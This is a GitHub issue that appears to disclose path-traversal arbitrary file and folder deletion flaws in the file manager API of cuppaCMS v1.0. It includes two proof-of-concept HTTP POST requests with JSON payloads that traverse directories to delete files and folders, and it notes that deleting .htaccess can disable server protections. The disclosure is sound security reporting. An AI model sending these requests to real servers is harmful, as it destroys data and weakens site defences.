Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Multiple Unauthorized Arbitrary File Deletion vulnerabilities #23

Open
liangyueliangyue opened this issue Feb 5, 2022 · 0 comments
Open

Comments

@liangyueliangyue
Copy link

liangyueliangyue commented Feb 5, 2022

Vulnerability Name: Multiple Arbitrary File Deletion

Date of Discovery: 06 Feb 2022

Product version:cuppaCMS v1.0Download link

Author: lyy

Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.

Proof of Concept 1

Vulnerable URL: http://cuppacms/js/filemanager/api/index.php
Vulnerable Code: line 116,118 - cuppacms/js/filemanager/api/FileManager.php
image

Steps to Reproduce:
1.Send the request directly through burp

POST /js/filemanager/api/index.php HTTP/1.1
Host: cuppacms
Content-Length: 45
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://cuppacms
Referer: http://cuppacms/js/filemanager/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"path":"/../test.php","action":"deleteFile"}

image

2.You can traverse the directory to delete any file

Proof of Concept 2

Vulnerable URL: http://cuppacms/js/filemanager/api/index.php
Vulnerable Code: line 124,138 - cuppacms/js/filemanager/api/FileManager.php
image

Steps to Reproduce:
1.Send the request directly through burp

POST /js/filemanager/api/index.php HTTP/1.1
Host: cuppacms
Content-Length: 40
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://cuppacms
Referer: http://cuppacms/js/filemanager/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"path":"/../1","action":"deleteFolder"}

image

2.You can traverse directories and delete directories,Delete all files in the directory while deleting the directory, so as to achieve the effect of deleting any file

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant